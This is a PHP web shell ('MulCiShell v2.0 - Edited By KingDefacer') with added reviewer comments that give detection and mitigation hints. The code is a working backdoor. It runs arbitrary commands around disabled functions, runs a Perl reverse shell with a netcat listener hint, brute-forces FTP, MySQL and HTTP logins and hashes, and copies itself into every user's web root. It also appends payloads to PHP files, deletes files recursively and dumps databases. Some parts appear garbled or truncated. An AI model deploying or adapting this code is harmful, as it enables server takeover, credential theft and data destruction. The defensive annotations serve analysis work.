function togglecheck() { var cb=document.forms[0].check for (i in cb) { cb[i].checked=(cb[i].checked)?false:true; } } ";
// NOTE(review): everything up to the closing quote above is the tail of an echo string
// (a client-side checkbox-toggle script); the statement that opens it is outside this excerpt.

// Access gate of the web shell. The case labels fall through on purpose, so level 3 runs
// all three checks, level 2 the last two and level 1 only the User-Agent check.
// $access_control, $allowed_addrs, $md5_user, $md5_pass and $user_agent are not defined in
// this excerpt.
// Detection notes: a client that fails the IP or User-Agent check gets a bare exit (empty
// response body); a failed credential check gets a 401 with Basic realm "Restricted area"
// and the body "Wrong username/password".
switch($access_control) #Break statements intentionally omitted
{
case 3:
// Level 3: REMOTE_ADDR is compared against the entries of $allowed_addrs.
$ip_allwd=false; foreach($allowed_addrs as $addr) { if($addr==$_SERVER['REMOTE_ADDR']) {$ip_allwd=true; break;} if(!$ip_allwd) exit; }
case 2:
// Level 2: HTTP Basic credentials are compared (loose !=) with $md5_user / $md5_pass.
// NOTE(review): no hashing is visible here despite the variable names - confirm where they are set.
if(!isset($_SERVER['PHP_AUTH_USER'])||$_SERVER['PHP_AUTH_USER']!=$md5_user||$_SERVER['PHP_AUTH_PW']!=$md5_pass) { header("WWW-Authenticate: Basic Realm=\"Restricted area\""); header("HTTP/1.1 401 Unauthorized"); echo "Wrong username/password"; exit; }
case 1:
// Level 1: the request's User-Agent header must equal $user_agent exactly.
if($_SERVER['HTTP_USER_AGENT']!=$user_agent) exit;
}
// Keeps the text between the first "(" and the following ")" of $id for the status table.
// NOTE(review): $id is assigned outside this excerpt - presumably output of the id command; confirm.
if($id) { $s=strpos($id,"(",0)+1; $e=strpos($id,")",$s); $idval=substr($id,$s,$e-$s); }
// PHP's disable_functions setting; the string "None" is the sentinel execmd() tests for.
$disable=@ini_get("disable_functions"); if(empty($disable)) $disable="None";
/**
 * Recursively deletes every file below $dir and echoes one progress line per entry.
 * Sub-directories are descended into; no rmdir() call is visible, so the directory
 * tree itself stays in place. All filesystem errors are suppressed with @.
 *
 * @param string $dir     Directory to walk.
 * @param int    $success Incremented by reference for each file unlinked.
 * @param int    $fail    Incremented by reference for each unlink() that fails.
 */
function rm_rep($dir,&$success,&$fail) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$rm=readdir($dh))) { if($rm=='.' || $rm=='..') continue; if(is_dir($dir.'/'.$rm)) {echo "Deleting dir $dir/$rm...
"; rm_rep($dir.'/'.$rm,$success,$fail); continue;} if(@unlink($dir.'/'.$rm)) {$success++;echo "Deleted $rm...
";} else {$fail++; echo "Failed to delete $rm
";} } @closedir($dh); } else echo "Failed to open dir $dir
"; }
/**
 * Recursively applies chmod($mod_value) to every file below $dir, with the same
 * traversal and counters as rm_rep(). Directories are descended into, not chmod-ed here.
 *
 * @param string $dir       Directory to walk.
 * @param int    $success   Incremented by reference for each successful chmod().
 * @param int    $fail      Incremented by reference for each failed chmod().
 * @param mixed  $mod_value Passed to chmod() unchanged; the caller supplies request input.
 */
function chmod_rep($dir,&$success,&$fail,$mod_value) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$ch=readdir($dh))) { if($ch=='.' || $ch=='..') continue; if(is_dir($dir.'/'.$ch)) {echo "Changing file modes in dir $dir/$ch...
"; chmod_rep($dir.'/'.$ch,$success,$fail,$mod_value); continue;} if(@chmod($dir.'/'.$ch,$mod_value)) {$success++;echo "Changed mode for $ch...
";} else {$fail++; echo "Failed to chmod $rm
";} } @closedir($dh); } else echo "Failed to open dir $dir
"; }
#Complete these functions
/**
 * Self-propagation routine: copies the running script (cwd + basename of PHP_SELF) to a
 * file named mshell.php in $dir and in writable sub-directories, recursing into each
 * sub-directory. With no $d given the target is /home/$user/public_html/.
 *
 * Defender notes: hunt for files named mshell.php under users' web roots and for one
 * web-server account creating files in several accounts' docroots. Per-account
 * isolation, so the web-server user cannot write outside its own docroot, limits this.
 *
 * @param string $user Account name used to build the default target path.
 * @param int    $c    Copy counter, passed by reference.
 * @param mixed  $d    Explicit directory to use instead of the default (0 = default).
 */
function spread_self($user,&$c=0,$d=0) { if(!$d) $dir="/home/$user/public_html/"; else $dir=$d; if(is_dir($dir)&&is_writable($dir)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php'); echo "[+] Shell copied to $dir.$f./mshell.php
"; $c++; } if(@$dh=opendir($dir)) echo "[-] Failed to open dir $dir
"; while((@$f=readdir($dh))) { if($f!="."&&$f!="..") { if(@is_dir($dir.$f)) { echo "[+] Spreading to dir $dir
"; if(@is_writable($dir.$f)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php'); echo "[+] Shell copied to $dir.$f./mshell.php
"; $c++; } $c+=spread_self($user,$c,$dir.$f.'/'); } } } }
// Empty stub: no behaviour is implemented in this copy.
function copy_rep($dir,&$c) { }
// Only prints the tool description when $_POST['busite'] is absent; no archive or
// download logic is visible in this copy.
function backup_site() { if(!isset($_POST['busite'])) { echo "
The following tool will attempt to retrieve every file from the specified dir (including child dirs).
If successful, you will be prompted for a site backup download.
Note: Only readable files will be downloaded. Images and executables will be discarded. This tool should only be used in scenarios in which you have to quickly retrieve a site's source.
"; } }
// Empty stubs: no behaviour is implemented in this copy.
function infect_rep($dir,&$success,&$fail) { }
function copy_dir($dir,$new_dir) { }
##################################
/**
 * Runs an operating-system command through whichever PHP process-execution function
 * is still available.
 *
 * When $d_functions is "None" the command goes to passthru(). Otherwise $d_functions is
 * read as the comma-separated disable_functions list and the candidates in $funcs are
 * walked in order; the first one not in that list is used.
 *
 * Defender notes: disabling only part of the $funcs list leaves the rest usable by
 * this routine, so all six names need to be covered by disable_functions. Child
 * processes spawned by the web-server account are the main runtime indicator.
 *
 * @param string $cmd         Command line; callers in this file build it from request input.
 * @param string $d_functions Value of disable_functions, or "None".
 * @return mixed The selected function's result, or -1 when popen/proc_open fail or
 *               no candidate function is usable.
 */
function execmd($cmd,$d_functions="None") { if($d_functions=="None") {$ret=passthru($cmd); return $ret;} $funcs=array("shell_exec","exec","passthru","system","popen","proc_open"); $d_functions=str_replace(" ","",$d_functions); $dis_funcs=explode(",",$d_functions); foreach($funcs as $safe) { if(!in_array($safe,$dis_funcs)) { if($safe=="exec") { $ret=@exec($cmd); $ret=join("\n",$ret); return $ret; } elseif($safe=="system") { $ret=@system($cmd); return $ret; } elseif($safe=="passthru") { $ret=@passthru($cmd); return $ret; } elseif($safe=="shell_exec") { $ret=@shell_exec($cmd); return $ret; } elseif($safe=="popen") { $ret=@popen("$cmd",'r'); if(is_resource($ret)) { while(@!feof($ret)) $read.=@fgets($ret); @pclose($ret); return $read; } return -1; } elseif($safe="proc_open") { $cmdpipe=array( 0=>array('pipe','r'), 1=>array('pipe','w') ); $resource=@proc_open($cmd,$cmdpipe,$pipes); if(@is_resource($resource)) { while(@!feof($pipes[1])) $ret.=@fgets($pipes[1]); @fclose($pipes[1]); @proc_close($resource); return $ret; } return -1; } } } return -1; }
// Navigation menu. The values of the act query parameter listed here (enum, files,
// domains, sql, encode, sec, bf, bypass, tools, dbs, bh, backc, spread, kill) are useful
// search terms when reviewing web-server access logs for use of this shell.
$links=array("Enumerate"=>"$self?act=enum","Files"=>"$self?act=files","Domains"=>"$self?act=domains","MySQL"=>"$self?act=sql","Encoder"=>"$self?act=encode", "Sec. Info"=>"$self?act=sec","Cracker"=>"$self?act=bf", "Bypassers"=>"$self?act=bypass","Tools"=>"$self?act=tools","Databases"=>"$self?act=dbs","Backdoor Host"=>"$self?act=bh","Back Connect"=>"$self?act=backc","Spread Shell"=>"$self?act=spread","Kill Shell"=>"$self?act=kill");
// Banner string: a stable content signature for file scanning and response inspection.
echo "MulCiShell v2.0 - Edited By KingDefacer"; switch($_SESSION['theme']) { case 'green': echo " "; break; case 'dark': echo ""; break; default: echo " "; break; }
// NOTE(review): this base64 literal appears to decode to an HTML image tag that loads a
// picture from an external image host, so rendering the page causes a third-party
// request from the viewer's browser - decode offline to confirm.
echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2sudXMvaW1nNTI5LzExNjYv bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg=="); echo "
Server IPYour IPDisk spaceSafe_mode?Open_BaseDir?SystemServer softwareDisabled functionsIDShell location
$serv$addr$space of $total$safe_mode$open_basedir$uname$soft$disable$idval".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])."

"; foreach($links as $val=>$addr) echo "[ $val ]"; echo "

"; if(isset($_POST['encryption'])) { $e=$_POST['encrypt']; echo "


Input:
"; }
// 'dogetfile' action: $_POST[wgetfile] is interpolated unescaped into a wget command line
// that is run through execmd(). Indicator: wget spawned by the web-server account.
if(isset($_POST['dogetfile'])) execmd("wget $_POST[wgetfile]",$disable);
// 'doUpload' action: the uploaded file is moved to the request-chosen directory
// (u_location) under the client-supplied file name; no extension or path check is visible.
if(isset($_POST['doUpload'])) { $dir=$_POST['u_location']; $name=$_FILES['u_file']['name']; switch($_FILES['u_file']['error']) { case 0: if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name)) echo "File uploaded successfully
"; else echo "Failed to upload file!"; } }
// 'massfiles' action: applies $_POST['fileaction'] to every path in $_POST['files'] and
// keeps success/failure counters for the summary line.
if(isset($_POST['massfiles'])) { $fail=0; $success=0; switch($_POST['fileaction']) { case 'Infect':
#Nothing special here, just kick them while they're down
// 'Infect': opens each selected path ending in .php in append mode and writes a payload
// to its end. NOTE(review): the fwrite() literal is empty in this copy - presumably lost
// when the page was extracted; do not assume the deployed file appends nothing.
// Detection: file-integrity monitoring on .php files (size, mtime, trailing content).
foreach($_POST['files'] as $file) { $ext=strrchr($file,'.'); if($ext!=".php") continue; @$fh=fopen($file,'a'); if(@is_resource($fh)) { $success++; @fwrite($fh,""); @fclose($fh); } else $fail++; } echo "Successfully infected $success files; failed to infect $fail files
Exploit files as such: file.php?e=php code"; break; case 'Delete': foreach($_POST['files'] as $file) { if(is_dir($file)) rm_rep($file,$success,$fail); else { if(@unlink(CleanDir($file))) { echo "File $file deleted
"; $success++; } else { echo "Failed to delete file $file
"; $fail++; } } } echo "Total files deleted: $success; failed to delete $fail files
"; break; case 'Chmod': foreach($_POST['files'] as $file) { if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']); if(@chmod(CleanDir($file),$_POST['cmodv'])) { echo "Changed mode for $file
"; $success++; } else { echo "Failed to change mode for $file
"; $fail++; } } echo "Total files modes modified: $success; failed to chmod $fail files
"; break; } } if(isset($_POST['docrack'])) { $con=true; $show=0; $list=@fopen($_FILES['wordlist']['tmp_name'],'r'); if(is_resource($list)) { if(isset($_POST['ftpcrack'])) { echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...
"; if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port']; else $port='3306'; if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/",$_POST['ftp_timeout'])) $time=3; else $time=$_POST['ftp_timeout']; @$ftp=ftp_connect($_POST['ftp_host'],$port,$time); if(!$ftp) $con=false; if($con) { $show++; while(!feof($list)) { @$pass=fgets($list); if(ftp_login($ftp,$_POST['ftp_user'],trim($pass))) { echo "Password found! Password for $_POST[ftp_user] is $pass
"; @ftp_close($ftp); break; } if($show==10000){echo "Trying pass $pass...
"; $show=0;} } } else echo "Failed to connect!
"; } elseif(isset($_POST['remote_login'])) { //if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled."); /* $ch=curl_init($_POST['remote_login_target']); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,''); curl_exec($ch); */ if(preg_match("/^http:\/\/+/",$_POST['remote_login_target'])) die("Do not include http:// in the target URL."); $path=explode('/',$_POST['remote_login_target']); $site=$path[0]; for($i=1;$i"; break; } if($show===10000) { $show=0; echo "Trying pass $pass...
"; } } echo "Complete
"; } elseif(isset($_POST['mysqlcrack'])) { $host=$_POST['mysql_host']; $user=$_POST['mysql_user']; if(!empty($_POST['mysql_port'])) $host.=":$_POST[mysql_port]"; while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(@mysql_connect($host,$user,$pass)) { echo "Password found! Password for $user is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } elseif(isset($_POST['authcrack'])) { $arr=explode('/',$_POST['auth_url']); $con_url=$arr[0]; if(empty($_POST['auth_url'])) die("Enter a target first..."); for($i=1;$i5000) {$show=0; echo $pass;} $encode=base64_encode(trim($_POST['auth_user']).':'.$pass); $header="GET $path HTTP/1.1\r\n"; $header.="Host: $con_url\r\n"; $header.="Authorization: Basic $encode\r\n"; $header.="Connection: Close\r\n\r\n"; fputs($conn_url,$header,strlen($header)); $tmp++; while(!feof($conn_url)) { $tmp=fgets($conn_url); if(preg_match("/HTTP\/\d+\.\d+ 200+/",$tmp)) { echo "Password found! Password=$pass

"; break 2; } } } } echo "Done
"; } elseif(isset($_POST['md5crack'])) { if(empty($_POST['md5hash'])) die("Enter a hash before attempting to crack one ;)"); $md5=trim($_POST['md5hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(md5($pass)===$md5) { echo "Password found! Plaintext for $md5 is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } elseif(isset($_POST['sha1crack'])) { if(empty($_POST['sha1hash'])) die("Enter a hash before attempting to crack one ;)"); $sha1=trim($_POST['sha1hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(sha1($pass)===$sha1) { echo "Password found! Plaintext for $sha1 is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } } @fclose($list); } if(isset($_POST['port_scan'])) { switch($_POST['type']) { case 'php': extract($_POST); while($sport<=$eport) { echo "Trying port $sport"; if(@fsockopen($host,$sport,$errno,$errstr,2)) echo "Port $sport open
"; $sport++; } break; default: echo "Invalid request
"; } } if(isset($_POST['find_forums'])) { echo "
[ Forum locator ]


"; $found=0; global $int_paths; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html"; if(@is_dir($path)) { foreach($int_paths as $forum_path) { $full_path=$path."/$forum_path/"; if(@is_dir($full_path)) { echo "[+] Forum found: Path: $full_path
"; $found++; continue; } } } } echo "Scan complete. Found $found forums

"; } function find_configs($path,&$found) { if(@file_exists($path.'config.php')) { echo "Found config file: $path"."config.php
"; $found++; } @$dh=opendir($path); while((@$file=readdir($dh))) if(is_dir($file)&&$file!='.'&&$file!='..') find_configs($path.$file.'/',$found); @closedir($dh); } if(isset($_POST['find_configs'])) { $found=0; echo "
[ Config locator ]


"; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html/"; find_configs($path,$found); } @fclose($fp); echo "Scan complete. Found $found configs

"; } if(isset($_POST['execmd'])) {echo "
";} if(isset($_POST['execphp'])) {echo "
";} if(isset($_POST['cnewfile'])) { if(@fopen($_POST['newfile'],'w')) echo "File created
"; else echo "Failed to create file
"; } if(isset($_POST['cnewdir'])) { if(@mkdir($_POST['newdir'])) echo "Directory created
"; else echo "Failed to create directory
"; } if(isset($_POST['doeditfile'])) FileEditor(); switch($_GET['act']) { case 'backc': if(!isset($_POST['backconnip'])) { echo "
Address: Port:

Listen with netcat by executing 'nc -l -n -v -p 1337'

Note: Be sure to foward your port first
"; }
// Reverse-connection handler (the 'backc' action). Visible behaviour: $backconnect_perl,
// a base64 blob defined outside this excerpt, is decoded to a file named bc.pl; when the
// current directory is writable the file is run with perl through execmd(), with the
// request-supplied address and port as arguments, and then unlinked.
// Detection: perl spawned by the web-server account, a short-lived bc.pl in the web root
// or /tmp, and an outbound connection from the server to a client-chosen address and port.
// Mitigation: egress filtering for the web tier; process-spawning functions disabled.
else { if(empty($_POST['backconnport'])||empty($_POST['backconnip'])) die("Specify a host/port"); if(is_writable(".")) { @$fh=fopen(getcwd()."/bc.pl",'w'); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...
"; execmd("perl ".getcwd()."/bc.pl $_POST[backconnip] $_POST[backconnport]",$disable); if(!@unlink(getcwd()."/bc.pl")) echo "Warning: Failed to delete reverse-connection program
"; }
// Fallback when the current directory is not writable: the same blob is written to
// /tmp/bc.pl and removed again; no execmd() call is visible in this branch of this copy.
else { @$fh=fopen("/tmp/bc.pl","w"); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...
"; if(!@unlink("/tmp/bc.pl")) echo "

Warning: Failed to delete reverse-connection program<

/font>
"; } } break; case 'dbs': database_tools(); break; case 'sql': SQLLogin(); break; case 'sqledit': SQLEditor(); break; case 'download': SQLDownload(); break; case 'tools': show_tools(); break; case 'logout': $_SESSION=array(); session_destroy(); echo "Logged out from MySQL.
"; break; case 'f': FileEditor(); break; case 'encode':Encoder(); break; case 'bypass':security_bypass(); break; case 'bf':brute_force(); break; case 'bh': BackDoor(); break; case 'spread': if(!isset($_POST['spread_shell'])) { echo "
This tool will attempt to copy the shell into every writable directory on the server, in order to allow access maintaining.
Passwd file:
"; }
// 'spread' action, submitted form: reads the file named by $_POST['passwd_file'] line by
// line as colon-separated passwd records and calls spread_self() with the first field
// (the account name) of each record; $s counts the copies made.
// Detection: a web request that makes the web-server account read a passwd-format file
// and then create files under many /home/*/public_html trees.
else { $s=0; @$file=fopen($_POST['passwd_file'],'r'); if(is_resource($file)) { while(!feof($file)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($file)); spread_self($user,$s); } @fclose($file); } echo ($s>0)?"Spread complete. Successfully managed to spread the shell $s times
":"Failed to spread the shell.
"; } break;
// 'domains' action: sends this server's HTTP_HOST value in a plain-HTTP GET to the
// third-party reverse-IP service searchy.protecus.de (port 80) and echoes the raw
// response. Detection: outbound connections from the web server to that host name.
case 'domains': $header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0\r\n"; $header.="Host: searchy.protecus.de\r\n"; $header.="Connection: Close\r\n\r\n"; $domain_handle=fsockopen("searchy.protecus.de",80); @fputs($domain_handle,$header,strlen($header)); while(@!feof($domain_handle)) { echo fgets($domain_handle); } break;
// 'kill' action: without $_POST['justkill'] only a confirmation prompt is printed.
case 'kill': if(!isset($_POST['justkill'])) { echo "
Do you *really* want to kill the shell?

"; } else { if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.
"; else echo "Failed to delete shell
"; } break; case 'sec': $mysql_on=function_exists("mysql_connect")?"ON":"OFF"; $curl_on=function_exists("curl_init")?"ON":"OFF"; $magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF"; $register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON"; $include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled"; $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No"; $ver=phpversion(); echo "
Security overview
"; "
PHP VersionSafe modeOpen_BasedirMagic_QuotesRegister globals Remote includesRead /etc/passwd?MySQLcURL
$ver$safe_mode$open_basedir$magic_quotes_on$register_globals_on$include_on $etc_passwd$mysql_on$curl_on
"; break; case 'enum': $windows=0; $path=CleanDir(getcwd()); if(!eregi("Linux",php_uname())) {$windows=1;} if(!$windows) { $spath=str_replace("/home/","$serv/~",$path); $spath=str_replace("/public_html/","/",$spath); $URL="http://$spath/".basename($_SERVER['PHP_SELF']); echo "Enumerated shell link: $URL"; } else echo "Enumeration failed
"; break; } echo "
"; if(isset($_POST['sqlquery'])) { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_POST['db'])) @mysql_select_db($_POST['db']); $post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_error()); $affected=@mysql_num_rows($post_query); echo "Affected rows: $affected
"; } } $dirs=array(); $files=array(); if(!isset($_GET['d'])) {$d=CleanDir(realpath(getcwd())); $dh=@opendir(".") or die("Permission denied!");} else {$d=CleanDir($_GET['d']); $dh=@opendir($_GET['d']) or die("Permission denied!");} $current=explode("/",$d); echo "
Current location: ";for($p=0;$p$current[$p]/"; } echo "
"; if(isset($_GET['d'])) echo ""; else echo ""; echo ""; while(($f=@readdir($dh))) { if(@is_dir($d.'/'.$f)) $dirs[]=$f; else $files[]=$f; } asort($dirs); asort($files); @closedir($dh); foreach($dirs as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; $size="DIR"; @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),2); @$write=is_writable($d.'/'.$f)?"Yes":"No"; $mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); if($f==".") {continue;} elseif($f=="..") { $f=Trail($d.'/'.$f); echo ""; continue; } echo ""; } foreach($files as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; @$size=TrueSize(filesize($d.'/'.$f)); @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),3); @$write=is_writable($d.'/'.$f)?"Yes":"No"; @$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); echo ""; } echo "
FileSizeOwner/groupPermsWritableModifiedAction
..$size$own/$grp$ch$write$modNone
$f$size$own/$grp$ch$write$mod
$f$size$own/$grp$ch$write$mod

With checked file(s):
"; function SQLLogin() { global $self; if(!isset($_SESSION['log'])&&!isset($_POST['mconnect'])) { echo "
Host: Username: Password: Port:
"; } elseif(!isset($_SESSION['log'])&&isset($_POST['mconnect'])) { extract($_POST); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { $_SESSION['muser']=$muser; $_SESSION['mhost']=$mhost; $_SESSION['mpass']=$mpass; $_SESSION['mport']=$mport; $_SESSION['log']=true; header("Location: $self?act=sqledit"); } else echo "Failed to login with $muser@$mhost!
"; } else { header("Location: $self?act=sqledit"); } } function SQLEditor() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { echo "Logged in as $muser@$mhost [Logout]
"; echo "
Quick SQL query:
"; echo "


"; if(isset($_POST['sql_list_proc'])) { $res=mysql_list_processes(); echo ""; while($r=mysql_fetch_assoc($res)) echo ""; mysql_free_result($res); echo "
Proc IDHostDBCommandTime
$r[Id]$r[Host]$r[db]$r[Command]$r[Time]

"; } if(!isset($_GET['db'])) { if(isset($_POST['dbc'])) db_create(); if(isset($_GET['dropdb'])) SQLDrop(); echo ""; $all_your_base=mysql_list_dbs($conn); while($your_base=mysql_fetch_assoc($all_your_base)) { $tbl=mysql_query("SHOW TABLES FROM $your_base[Database]"); $tbl_count=mysql_num_rows($tbl); echo ""; } echo "
DatabaseTable countDownloadDrop
$your_base[Database]$tbl_countDownloadDrop

New database name:

"; } elseif(isset($_GET['db'])&&!isset($_GET['tbl'])) { if(isset($_POST['tblc'])) table_create(); if(isset($_GET['droptbl'])) SQLDrop(); echo ""; $tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($tblc=mysql_fetch_array($tables)) { $fCount=mysql_query("SHOW COLUMNS FROM $_GET[db].$tblc[0]"); $fc=mysql_num_rows($fCount); echo ""; } echo "
TableColumn countDumpDrop
$tblc[0]$fcDumpDrop

Create new table:
"; } elseif(isset($_GET['field'])&&isset($_POST['sqlsave'])) { $discard_values=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $values=mysql_fetch_assoc($discard_values); $keys=array_keys($values); $values=array(); foreach($_POST as $k=>$v) if(in_array($k,$keys)) $values[]=$v; $query="UPDATE $_GET[db].$_GET[tbl] SET "; for($y=0;$yTable updated!
"; echo "Go back

"; } elseif(isset($_GET['field'])&&isset($_GET['v'])&&!isset($_GET['del'])) { echo "
"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($field=mysql_fetch_assoc($fields)) $sql_fields[]=$field['Field']; $data=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $d_piece=mysql_fetch_assoc($data); for($m=0;$m
"; } echo "
"; } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { if(isset($_GET['insert'])) SQLInsert(); if(isset($_GET['field'])&&isset($_GET['v'])&&isset($_GET['del'])) { echo "
"; if(@mysql_query("DELETE FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]=$_GET[v]")) echo "Row deleted
"; else echo "Failed to delete row
"; echo "
"; } echo "
[Insert new row]
"; echo ""; $cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); $fields=array(); while($col=mysql_fetch_assoc($cols)) { array_push($fields,$col['Field']); echo ""; } echo ""; if(isset($_GET['s'])&&is_numeric($_GET['s'])) {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT $_GET[s], 250");} else {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT 0, 250");} while($select=mysql_fetch_row($selector)) { echo ""; for($i=0;$i".htmlspecialchars($select[$i]).""; } echo ""; echo ""; } echo "
$col[Field]
EditDelete
"; echo ""; if(isset($_GET['s'])) { $prev=intval($_GET['s'])-250; $next=intval($_GET['s'])+250; if($_GET['s']>0) echo ""; if(mysql_num_rows($selector)>249) echo ""; } else echo "
Next
"; echo "
PreviousNext
"; } else { $_SESSION=array(); session_destroy(); header("Location: $self?act=sql"); } } } function SQLDownload() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_GET['db'])&&!isset($_GET['tbl'])) { $tables=array(); $dump_file="##################SQL Database dump####################\n"; $dump_file.="######################Dumped by: MulciShell v0.2 - Edited By KingDefacer#####################\n\n"; $get_tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($current_table=mysql_fetch_array($get_tables)) $tables[]=$current_table[0]; foreach($tables as $table_dump) { $data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump"); while($current_data=mysql_fetch_assoc($data_selection)) { $fields=implode("`, `", array_keys($current_data)); $values=implode("`, `",array_values($current_data)); $dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($values); "; } } } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { $dump_file="##################SQL Database dump####################\n"; $dump_file.="######################Dumped by: MulciShell v0.2 - Edited By KingDefacer#####################\n"; $table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]"); while($table_data=mysql_fetch_assoc($table_dump)) { $fields=implode("`, `",array_keys($table_data)); $values=implode("`, `",array_values($table_data)); $dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)\n"; } } else { echo "Invalid!"; } } $dump_file.="########################################################################################"; if(!isset($_GET['tbl'])) $file_name="$_GET[db]"."_DUMP.sql"; else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql"; ob_get_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($dump_file)); header("Content-disposition: attachment; filename=$file_name;"); echo $dump_file; exit; 
}
// Obfuscated second stage embedded between two function definitions; it runs at file
// load time. $_F holds this file's path, $_X holds a base64 blob, and the eval() argument
// is itself base64.
// NOTE(review): decoded offline, the inner literal reads as PHP that base64-decodes $_X,
// swaps characters with strtr('123456aouie' <-> 'aouie123456'), substitutes __FILE__ with
// $_F and eval()s the result; the start of $_X then reads as HTML script markup that
// writes further escaped content into the page. Treat this as an injector planted inside
// the shell itself, re-verify the decoding independently, and open the sample only in an
// isolated analysis environment.
// Detection: the combination eval(base64_decode(...)) together with $_F=__FILE__ and a
// long $_X literal is a common static signature for this packer family.
